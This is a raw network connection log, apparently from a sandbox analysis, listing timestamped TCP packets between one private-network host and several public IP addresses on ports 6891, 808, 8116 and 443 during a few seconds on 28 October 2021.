Oct 28, 2021 05:28:18.289488077 CEST	50060	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:18.388904095 CEST	808	50061	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:18.388916016 CEST	808	50061	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:18.389126062 CEST	50061	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:18.391623020 CEST	50061	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:18.410824060 CEST	50062	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:18.455537081 CEST	6891	50060	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:18.464492083 CEST	8116	50062	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:18.464611053 CEST	50062	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:18.465363026 CEST	50062	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:18.503674030 CEST	50063	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:18.517935038 CEST	8116	50062	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:18.518033981 CEST	8116	50062	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:18.518132925 CEST	50062	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:18.518657923 CEST	50062	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:18.523003101 CEST	50062	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:18.523127079 CEST	50062	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:18.563221931 CEST	808	50061	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:18.575730085 CEST	8116	50062	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:18.669783115 CEST	6891	50063	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:18.669979095 CEST	50063	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:18.670806885 CEST	50063	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:18.768778086 CEST	8116	50062	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:18.768804073 CEST	8116	50062	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:18.769011021 CEST	50062	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:18.769061089 CEST	50062	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:18.775793076 CEST	50062	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:18.828433990 CEST	8116	50062	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:18.838488102 CEST	6891	50063	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:18.838522911 CEST	6891	50063	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:18.838821888 CEST	50063	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:18.839540958 CEST	50063	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:18.844435930 CEST	50063	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:18.844507933 CEST	50063	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:18.907852888 CEST	50064	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:18.907901049 CEST	443	50064	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:18.908091068 CEST	50064	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:18.909276009 CEST	50064	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:18.909301996 CEST	443	50064	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:19.010703087 CEST	6891	50063	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:19.010724068 CEST	6891	50063	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:19.409882069 CEST	6891	50063	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:19.409914970 CEST	6891	50063	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:19.410067081 CEST	50063	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:19.413352966 CEST	50063	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:19.424719095 CEST	443	50064	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:19.424827099 CEST	50064	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:19.425523043 CEST	50064	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:19.425539970 CEST	443	50064	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:19.431380987 CEST	50064	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:19.431399107 CEST	443	50064	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:19.431541920 CEST	50064	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:19.431552887 CEST	443	50064	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:19.539119005 CEST	50065	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:19.579303026 CEST	6891	50063	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:19.593174934 CEST	8116	50065	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:19.593282938 CEST	50065	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:19.594336033 CEST	50065	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:19.648042917 CEST	8116	50065	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:19.648118973 CEST	8116	50065	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:19.648179054 CEST	50065	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:19.648750067 CEST	50065	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:19.652816057 CEST	50065	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:19.652955055 CEST	50065	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:19.706538916 CEST	8116	50065	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:19.706568003 CEST	8116	50065	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:19.707325935 CEST	8116	50065	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:19.893855095 CEST	8116	50065	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:19.893872976 CEST	8116	50065	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:19.893913984 CEST	50065	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:19.893969059 CEST	50065	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:19.897166014 CEST	50065	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:19.951493025 CEST	8116	50065	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:20.023379087 CEST	50066	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:20.023427010 CEST	443	50066	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:20.023519039 CEST	50066	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:20.024230003 CEST	50066	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:20.024244070 CEST	443	50066	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:20.426445961 CEST	443	50064	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:20.426526070 CEST	443	50064	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:20.426587105 CEST	50064	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:20.426618099 CEST	50064	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:20.433841944 CEST	50064	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:20.433876991 CEST	443	50064	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:20.515710115 CEST	443	50066	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:20.516005993 CEST	50066	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:20.516643047 CEST	50066	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:20.516654015 CEST	443	50066	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:20.521817923 CEST	50066	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:20.521833897 CEST	443	50066	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:20.521936893 CEST	50066	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:20.521945953 CEST	443	50066	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:20.551508904 CEST	50067	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:20.720926046 CEST	808	50067	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:20.721076012 CEST	50067	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:20.722111940 CEST	50067	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:20.891416073 CEST	808	50067	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:20.891628981 CEST	808	50067	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:20.891756058 CEST	50067	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:20.892664909 CEST	50067	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:20.906716108 CEST	50067	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:20.906959057 CEST	50067	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:21.061965942 CEST	808	50067	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:21.076163054 CEST	808	50067	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:21.076179028 CEST	808	50067	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:21.076231956 CEST	808	50067	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:21.207465887 CEST	443	50066	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:21.207576036 CEST	443	50066	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:21.207742929 CEST	50066	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:21.207854986 CEST	50066	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:21.214575052 CEST	50066	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:21.214603901 CEST	443	50066	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:21.347688913 CEST	50068	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:21.510344982 CEST	808	50068	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:21.510555029 CEST	50068	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:21.511265039 CEST	50068	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:21.673659086 CEST	808	50068	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:21.673897982 CEST	808	50068	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:21.673979998 CEST	50068	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:21.674411058 CEST	50068	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:21.677050114 CEST	50068	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:21.677150011 CEST	50068	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:21.836302042 CEST	808	50068	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:21.838862896 CEST	808	50068	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:21.838888884 CEST	808	50068	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:21.838902950 CEST	808	50068	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:21.838917971 CEST	808	50068	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:21.838932037 CEST	808	50068	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:28.802242041 CEST	808	50067	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:28.802277088 CEST	808	50067	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:28.802335024 CEST	50067	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:28.802371979 CEST	50067	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:28.808012962 CEST	50067	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:28.929002047 CEST	50069	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:28.977339983 CEST	808	50067	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:29.095038891 CEST	6891	50069	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:29.095375061 CEST	50069	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:29.095819950 CEST	50069	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:29.262662888 CEST	6891	50069	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:29.262834072 CEST	6891	50069	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:29.265049934 CEST	50069	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:29.265077114 CEST	50069	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:29.267936945 CEST	50069	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:29.268032074 CEST	50069	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:29.435312033 CEST	6891	50069	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:29.568429947 CEST	808	50068	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:29.568455935 CEST	808	50068	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:29.568655014 CEST	50068	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:29.568809032 CEST	50068	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:29.571985960 CEST	50068	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:29.699125051 CEST	50070	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:29.733799934 CEST	808	50068	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:29.819938898 CEST	6891	50069	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:29.819982052 CEST	6891	50069	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:29.820175886 CEST	50069	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:29.832885981 CEST	50069	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:29.865276098 CEST	6891	50070	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:29.865386963 CEST	50070	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:29.866719007 CEST	50070	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:29.947108984 CEST	50071	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:29.999017000 CEST	6891	50069	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:30.001471043 CEST	8116	50071	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:30.002203941 CEST	50071	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:30.002898932 CEST	50071	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:30.032634974 CEST	6891	50070	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:30.032735109 CEST	6891	50070	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:30.032828093 CEST	50070	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:30.033497095 CEST	50070	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:30.038953066 CEST	50070	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:30.039386034 CEST	50070	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:30.056554079 CEST	8116	50071	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:30.056988001 CEST	8116	50071	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:30.057192087 CEST	50071	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:30.057790995 CEST	50071	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:30.061887026 CEST	50071	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:30.062020063 CEST	50071	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:30.115716934 CEST	8116	50071	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:30.115741014 CEST	8116	50071	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:30.153610945 CEST	8116	50071	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:30.204947948 CEST	6891	50070	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:30.205224037 CEST	6891	50070	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:30.205238104 CEST	6891	50070	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:30.287576914 CEST	8116	50071	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:30.287611961 CEST	8116	50071	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:30.287722111 CEST	50071	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:30.287779093 CEST	50071	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:30.300154924 CEST	50071	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:30.353879929 CEST	8116	50071	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:30.415105104 CEST	50072	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:30.415148020 CEST	443	50072	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:30.415317059 CEST	50072	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:30.416398048 CEST	50072	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:30.416418076 CEST	443	50072	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:30.584665060 CEST	6891	50070	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:30.584683895 CEST	6891	50070	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:30.584923983 CEST	50070	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:30.588427067 CEST	50070	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:30.714375973 CEST	50073	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:30.754384995 CEST	6891	50070	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:30.766419888 CEST	8116	50073	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:30.766647100 CEST	50073	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:30.767839909 CEST	50073	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:30.819998980 CEST	8116	50073	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:30.820050001 CEST	8116	50073	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:30.820293903 CEST	50073	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:30.821094036 CEST	50073	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:30.828042030 CEST	50073	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:30.828207016 CEST	50073	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:30.880115986 CEST	8116	50073	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:30.880389929 CEST	8116	50073	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:30.880647898 CEST	8116	50073	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:30.908673048 CEST	443	50072	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:30.908915043 CEST	50072	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:30.909995079 CEST	50072	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:30.910002947 CEST	443	50072	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:30.917956114 CEST	50072	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:30.917973042 CEST	443	50072	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:30.918107986 CEST	50072	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:30.918119907 CEST	443	50072	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:31.049518108 CEST	8116	50073	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:31.049568892 CEST	8116	50073	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:31.049884081 CEST	50073	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:31.049932957 CEST	50073	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:31.059246063 CEST	50073	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:31.111074924 CEST	8116	50073	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:31.176779985 CEST	50074	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:31.176841021 CEST	443	50074	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:31.176933050 CEST	50074	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:31.177484035 CEST	50074	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:31.177515984 CEST	443	50074	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:31.614198923 CEST	443	50072	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:31.614284992 CEST	443	50072	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:31.614367008 CEST	50072	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:31.624675035 CEST	50072	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:31.624707937 CEST	443	50072	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:31.699769974 CEST	443	50074	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:31.700386047 CEST	50074	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:31.700994968 CEST	50074	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:31.701004028 CEST	443	50074	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:31.708231926 CEST	50074	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:31.708244085 CEST	443	50074	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:31.708437920 CEST	50074	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:31.708448887 CEST	443	50074	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:31.739653111 CEST	50075	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:31.904275894 CEST	808	50075	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:31.904500008 CEST	50075	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:31.905152082 CEST	50075	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:32.069180965 CEST	808	50075	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:32.069202900 CEST	808	50075	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:32.071939945 CEST	50075	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:32.072561026 CEST	50075	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:32.077518940 CEST	50075	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:32.077661991 CEST	50075	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:32.236943007 CEST	808	50075	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:32.241844893 CEST	808	50075	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:32.241864920 CEST	808	50075	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:32.241883993 CEST	808	50075	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:32.426656008 CEST	443	50074	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:32.426737070 CEST	443	50074	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:32.426918983 CEST	50074	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:32.430135965 CEST	50074	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:32.430171013 CEST	443	50074	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:32.588073969 CEST	50076	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:32.627197981 CEST	808	50075	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:32.627316952 CEST	50075	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:32.627337933 CEST	808	50075	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:32.627388954 CEST	50075	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:32.634993076 CEST	50075	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:32.754610062 CEST	808	50076	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:32.757066011 CEST	50076	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:32.757754087 CEST	50076	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:32.798013926 CEST	808	50075	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:32.803163052 CEST	50077	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:32.924154997 CEST	808	50076	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:32.924240112 CEST	808	50076	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:32.924313068 CEST	50076	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:32.924906015 CEST	50076	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:32.928826094 CEST	50076	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:32.928941965 CEST	50076	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:32.970094919 CEST	6891	50077	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:32.970278025 CEST	50077	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:32.971004009 CEST	50077	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:33.091043949 CEST	808	50076	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:33.095071077 CEST	808	50076	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:33.095103979 CEST	808	50076	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:33.095118046 CEST	808	50076	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:33.095133066 CEST	808	50076	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:33.136987925 CEST	6891	50077	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:33.137057066 CEST	6891	50077	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:33.137155056 CEST	50077	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:33.137655020 CEST	50077	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:33.143702984 CEST	50077	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:33.143809080 CEST	50077	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:33.309725046 CEST	6891	50077	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:33.469202042 CEST	808	50076	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:33.469235897 CEST	808	50076	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:33.469434977 CEST	50076	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:33.469641924 CEST	50076	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:33.472544909 CEST	50076	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:33.604274988 CEST	50078	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:33.638782024 CEST	808	50076	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:33.696369886 CEST	6891	50077	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:33.696404934 CEST	6891	50077	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:33.696541071 CEST	50077	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:33.704473972 CEST	50077	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:33.770335913 CEST	6891	50078	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:33.770438910 CEST	50078	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:33.771198034 CEST	50078	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:33.819319010 CEST	50079	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:33.870534897 CEST	6891	50077	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:33.873940945 CEST	8116	50079	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:33.874068975 CEST	50079	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:33.874774933 CEST	50079	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:33.931102991 CEST	8116	50079	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:33.931133032 CEST	8116	50079	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:33.931237936 CEST	50079	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:33.931804895 CEST	50079	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:33.935904026 CEST	50079	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:33.936031103 CEST	50079	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:33.937086105 CEST	6891	50078	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:33.937248945 CEST	6891	50078	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:33.937319994 CEST	50078	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:33.937846899 CEST	50078	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:33.941895008 CEST	50078	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:33.942054987 CEST	50078	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:33.991837978 CEST	8116	50079	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:33.991873980 CEST	8116	50079	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:34.108889103 CEST	6891	50078	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:34.108913898 CEST	6891	50078	45.77.0.96	192.168.2.3
